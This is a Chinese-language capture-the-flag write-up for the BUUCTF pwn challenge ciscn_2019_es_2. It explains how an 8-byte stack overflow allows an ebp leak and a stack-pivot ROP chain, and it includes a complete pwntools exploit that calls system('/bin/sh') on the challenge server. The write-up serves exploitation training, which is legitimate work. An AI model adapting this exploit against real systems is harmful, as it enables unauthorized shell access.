BUUCTF-Pwn-ciscn_2019_es_2

题目截图

例行检查

同IDA打开查看字符串，找到system函数和一个与flag相关的字符串

利用交叉引用找到Hack函数，其中调用了system函数，但是参数并不能让我们getshell或者得到flag

继续查看主函数

查看函数vul()，存在栈溢出，但是只溢出了8个字节，只能覆盖ebp和ret，可以考虑使用栈迁移

函数vul()中有两次输入和两次输出，可以利用第一次输入和输出泄露ebp的值、计算栈顶地址、布置栈，然后再利用第二次输入覆盖ebp和ret进行栈迁移，再次回到栈顶，执行我们布置好的rop链
使用动调计算上一个栈的大小为0x10，保存的为上一个栈的ebp，所以利用栈的栈顶地址为泄露ebp-0x10-0x28

exp

from pwn import *
path='/home/lhb/桌面/ciscn_2019_es_2'
elf=ELF(path)
p=remote('node4.buuoj.cn', 26511)
system_plt=elf.plt['system']
leave_ret=0x80485fd
payload=b'a'*(0x27)
p.recv()
p.sendline(payload)

addr=u32(p.recvuntil(p32(0x804862a))[-8:-4])

payload=p32(addr)
payload+=p32(system_plt)+p32(0)+p32(addr-0x28)
payload+=b'/bin/sh\0'+b'a'*(0x28-16-8)
payload+=p32(addr-0x38)+p32(leave_ret)
p.sendline(payload)

p.interactive()